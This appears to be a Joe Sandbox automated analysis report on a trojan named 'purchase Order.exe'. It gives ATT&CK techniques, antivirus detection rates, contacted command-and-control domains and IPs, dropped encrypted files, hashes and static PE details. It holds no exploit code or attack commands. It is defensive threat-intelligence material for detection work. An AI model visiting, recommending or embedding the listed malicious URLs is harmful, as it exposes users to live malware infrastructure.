DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
purchase Order.exe	58%	ReversingLabs	Win32.Trojan.AutoitInject
purchase Order.exe	63%	Virustotal		Browse
purchase Order.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
www.vayui.top	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.laohub10.net/sgdd/	0%	Avira URL Cloud	safe
http://server/get.asp	0%	Avira URL Cloud	safe
http://www.t91rl7.pro	0%	Avira URL Cloud	safe
http://www.amayavp.xyz/d9ku/	0%	Avira URL Cloud	safe
http://www.soainsaat.xyz/rum2/	0%	Avira URL Cloud	safe
http://www.xcvbj.asia/rq1s/	0%	Avira URL Cloud	safe
http://www.rgenerousrs.store/o362/	0%	Avira URL Cloud	safe
http://www.t91rl7.pro/jhb8/	0%	Avira URL Cloud	safe
http://www.vayui.top/vg0z/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.vayui.top	172.67.145.234	true	true	2%, Virustotal, Browse	unknown
www.amayavp.xyz	185.27.134.144	true	true		unknown
r0lqcud7.nbnnn.xyz	27.124.4.246	true	true		unknown
www.xcvbj.asia	149.88.81.190	true	true		unknown
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false		high
www.rgenerousrs.store	172.67.167.146	true	true		unknown
www.nb-shenshi.buzz	161.97.168.245	true	true		unknown
natroredirect.natrocdn.com	85.159.66.93	true	false		high
www.t91rl7.pro	154.88.22.110	true	true		unknown
www.laohub10.net	unknown	unknown	false		unknown
www.soainsaat.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.laohub10.net/sgdd/	true	Avira URL Cloud: safe	unknown
http://www.vayui.top/vg0z/	true	Avira URL Cloud: safe	unknown
http://www.t91rl7.pro/jhb8/	true	Avira URL Cloud: safe	unknown
http://www.rgenerousrs.store/o362/	true	Avira URL Cloud: safe	unknown
http://www.soainsaat.xyz/rum2/	true	Avira URL Cloud: safe	unknown
http://www.xcvbj.asia/rq1s/	true	Avira URL Cloud: safe	unknown
http://www.amayavp.xyz/d9ku/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://server/get.asp	svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.t91rl7.pro	McqlvggSSSjC.exe, 00000006.00000002.3223837018.00000000058E7000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.88.81.190	www.xcvbj.asia	United States	188	SAIC-ASUS	true
154.88.22.110	www.t91rl7.pro	Seychelles	40065	CNSERVERSUS	true
172.67.167.146	www.rgenerousrs.store	United States	13335	CLOUDFLARENETUS	true
185.27.134.144	www.amayavp.xyz	United Kingdom	34119	WILDCARD-ASWildcardUKLimitedGB	true
27.124.4.246	r0lqcud7.nbnnn.xyz	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	true
172.67.145.234	www.vayui.top	United States	13335	CLOUDFLARENETUS	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
161.97.168.245	www.nb-shenshi.buzz	United States	51167	CONTABODE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561730
Start date and time:	2024-11-24 08:11:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	purchase Order.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@11/8
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 86% Number of executed functions: 52 Number of non-executed functions: 309
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.88.81.190	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.xcvbj.asia/rq1s/
154.88.22.110	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.t91rl7.pro/jhb8/
172.67.167.146	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/zr8v/
185.27.134.144	DOC_114542366.vbe	Get hash	malicious	FormBook	Browse	www.amayavp.xyz/dcdf/
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.amayavp.xyz/d9ku/
	shipping doc_20241111.exe	Get hash	malicious	FormBook	Browse	www.hasthosting.xyz/04fb/
	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	www.hasthosting.xyz/04fb/
	http://outlook-accede-aqui.iceiy.com/	Get hash	malicious	Unknown	Browse	outlook-accede-aqui.iceiy.com/jquery.min.js
27.124.4.246	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
172.67.145.234	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.vayui.top/vg0z/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
r0lqcud7.nbnnn.xyz	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	New Order - RCII900718_Contract Drafting.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
www.xcvbj.asia	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	149.88.81.190
www.rgenerousrs.store	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	172.67.167.146
www.rgenerousrs.store	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
natroredirect.natrocdn.com	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Certificate 1045-20-11.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Certificate 719A1120-2024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	need quotations.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	RvJVMsNLJI.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Certificate 64411-18.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.amayavp.xyz	DOC_114542366.vbe	Get hash	malicious	FormBook	Browse	185.27.134.144
www.amayavp.xyz	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	185.27.134.144
www.vayui.top	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	172.67.145.234
s-part-0035.t-0009.t-msedge.net	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.63
	4yOuoT4GFy.exe	Get hash	malicious	AsyncRAT	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
www.nb-shenshi.buzz	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	161.97.168.245
www.nb-shenshi.buzz	need quotations.exe	Get hash	malicious	FormBook	Browse	161.97.168.245

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNSERVERSUS	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.224.208.11
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.225.247.211
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	154.88.22.110
	New Order - RCII900718_Contract Drafting.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	http://dgzl77sj9.top	Get hash	malicious	Unknown	Browse	23.225.172.181
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	23.224.201.90
	Hh2x1P87eY.exe	Get hash	malicious	Unknown	Browse	154.90.47.77
	IXru5EKmkc.dll	Get hash	malicious	Unknown	Browse	154.90.47.77
	Hh2x1P87eY.exe	Get hash	malicious	Unknown	Browse	154.90.47.77
CLOUDFLARENETUS	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	172.67.168.228
	Papyment_Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TAX INVOICE.exe	Get hash	malicious	FormBook	Browse	104.21.76.162
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar	Browse	104.21.74.61
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC	Browse	172.67.160.80
	WC10SCPMaX.exe	Get hash	malicious	Azorult, GuLoader	Browse	172.67.165.138
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
WILDCARD-ASWildcardUKLimitedGB	Quotation.exe	Get hash	malicious	FormBook	Browse	185.27.134.206
	payments.exe	Get hash	malicious	FormBook	Browse	185.27.134.206
	http://modelingcontest.000.pe/en?fbclid=PAZXh0bgNhZW0CMTEAAaa6oIoeflm16eQmOq1EZIkCPi7LQwqIUcx7ZtlQ7FlCxpWEYZM0cKUWzVI_aem_dLuQfyf714XDRjlRdJDY2Q	Get hash	malicious	HTMLPhisher	Browse	185.27.134.231
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	185.27.134.206
	DOC_114542366.vbe	Get hash	malicious	FormBook	Browse	185.27.134.144
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	185.27.134.144
	shipping doc_20241111.exe	Get hash	malicious	FormBook	Browse	185.27.134.144
	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	185.27.134.144
	https://downloadourauthfile-list.thsite.top/?em=EU-Sales-Support@scanlab.de	Get hash	malicious	Unknown	Browse	185.27.134.155
	http://appealaccountreporte.rf.gd/?i=1	Get hash	malicious	Unknown	Browse	185.27.134.215
SAIC-ASUS	yakuza.i586.elf	Get hash	malicious	Mirai	Browse	139.121.41.93
	arm4.elf	Get hash	malicious	Mirai	Browse	149.83.228.200
	spc.elf	Get hash	malicious	Mirai	Browse	149.88.69.25
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	149.88.81.190
	mips.elf	Get hash	malicious	Mirai	Browse	149.64.190.242
	x86.elf	Get hash	malicious	Unknown	Browse	149.73.164.35
	zgp.elf	Get hash	malicious	Mirai	Browse	139.121.236.123
	amen.sh4.elf	Get hash	malicious	Mirai	Browse	149.80.195.123
	mpsl.elf	Get hash	malicious	Mirai	Browse	149.64.190.212
	yakuza.x86.elf	Get hash	malicious	Unknown	Browse	149.80.141.64

Process:	C:\Users\user\Desktop\purchase Order.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.994986300487063
Encrypted:	true
SSDEEP:	6144:twT7mqHnDMcTFeCVRX8wOuM046740C7mslnLmAm:t47nDZBeCVRX5OuM046741E
MD5:	430FA9EB200CA45DB4FED07448702C8E
SHA1:	0354C66196D59F31CA3170C3FDB73F32F2EA6ACD
SHA-256:	BB1F6B7CC2DC36C832E623EE2D069E7053705DC96D27B8455FE02B7CFAB8A905
SHA-512:	6F39C9B126028A0C36E495605EF1FE7948DB7B92AF33AF82C05C140C0B4EA3160D898CFF75E1A5D677170D124576208A6F7FB406CAC95DE88E35320CA9D9568D
Malicious:	false
Reputation:	low
Preview:	x..U5YE3R4I4.UR.79ZR131r45A0U6YE3V4I49YURP79ZR131245A0U6YE3.4I47F.\P.0.s.2}..a)Y&.)7\1F(Y.:4<>XMz0T.CGZ.(^ur...;[-Q.TXXt79ZR131K5<..5Q.xS1.tT^.O....:5.)....!W.,...jT..k06:mW^.R131245A`.6Y.2W4.B..URP79ZR1.105>@;U6.A3V4I49YUR.#9ZR!312D1A0UvYE#V4I69YSRP79ZR151245A0U6)A3V6I49YURR7y.R1#12$5A0U&YE#V4I49YERP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YUR~C\"&131Fc1A0E6YEkR4I$9YURP79ZR13124.A056YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I4

C:\Users\user\AppData\Local\Temp\aut2EA4.tmp

Download File

Process:	C:\Users\user\Desktop\purchase Order.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.994986300487063
Encrypted:	true
SSDEEP:	6144:twT7mqHnDMcTFeCVRX8wOuM046740C7mslnLmAm:t47nDZBeCVRX5OuM046741E
MD5:	430FA9EB200CA45DB4FED07448702C8E
SHA1:	0354C66196D59F31CA3170C3FDB73F32F2EA6ACD
SHA-256:	BB1F6B7CC2DC36C832E623EE2D069E7053705DC96D27B8455FE02B7CFAB8A905
SHA-512:	6F39C9B126028A0C36E495605EF1FE7948DB7B92AF33AF82C05C140C0B4EA3160D898CFF75E1A5D677170D124576208A6F7FB406CAC95DE88E35320CA9D9568D
Malicious:	false
Reputation:	low
Preview:	x..U5YE3R4I4.UR.79ZR131r45A0U6YE3V4I49YURP79ZR131245A0U6YE3.4I47F.\P.0.s.2}..a)Y&.)7\1F(Y.:4<>XMz0T.CGZ.(^ur...;[-Q.TXXt79ZR131K5<..5Q.xS1.tT^.O....:5.)....!W.,...jT..k06:mW^.R131245A`.6Y.2W4.B..URP79ZR1.105>@;U6.A3V4I49YUR.#9ZR!312D1A0UvYE#V4I69YSRP79ZR151245A0U6)A3V6I49YURR7y.R1#12$5A0U&YE#V4I49YERP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YUR~C\"&131Fc1A0E6YEkR4I$9YURP79ZR13124.A056YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I49YURP79ZR131245A0U6YE3V4I4

C:\Users\user\AppData\Local\Temp\z5f52P3-

Download File

Process:	C:\Windows\SysWOW64\bitsadmin.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.141838602357736
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	purchase Order.exe
File size:	1'209'344 bytes
MD5:	e46648bd205f6e9908880c73a9cb2847
SHA1:	478c6f62acfbf5e91d5cfa6fb7511816be5cce57
SHA256:	b67a3251ab0a9126e283677b065a75f6463e4cd0becc96f1a78dce212cce4b2e
SHA512:	d4874568d2c2705da18af430f66d8ea7f6f75dd8b8b091a9ae24816ae3eafbbad3e1a6a921c466adc72c9f7b90ea96c83a3e24dc52f0ed7d217fc940ddcbf3e6
SSDEEP:	24576:ftb20pkaCqT5TBWgNQ7a20DBAXMQ2iDxz9e3kJYvhR6A:cVg5tQ7a20tAcCoHL5
TLSH:	AF45CF1373DEC361C7B25273BA257701AEBB782506A5F96B2FD4093DB820122525EB73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673DC1A1 [Wed Nov 20 11:01:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007FF76C98BA7Fh
jmp 00007FF76C97EA94h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FF76C97EC1Ah
cmp edi, eax
jc 00007FF76C97EF7Eh
bt dword ptr [004C0158h], 01h
jnc 00007FF76C97EC19h
rep movsb
jmp 00007FF76C97EF2Ch
cmp ecx, 00000080h
jc 00007FF76C97EDE4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FF76C97EC20h
bt dword ptr [004BA370h], 01h
jc 00007FF76C97F0F0h
bt dword ptr [004C0158h], 00000000h
jnc 00007FF76C97EDBDh
test edi, 00000003h
jne 00007FF76C97EDCEh
test esi, 00000003h
jne 00007FF76C97EDADh
bt edi, 02h
jnc 00007FF76C97EC1Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FF76C97EC23h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FF76C97EC75h
bt esi, 03h
jnc 00007FF76C97ECC8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5e304	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x123000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x5e304	0x5e400	637f9da746bb57036dd66621e9014650	False	0.9303143650530504	data	7.899635990430421	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x123000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
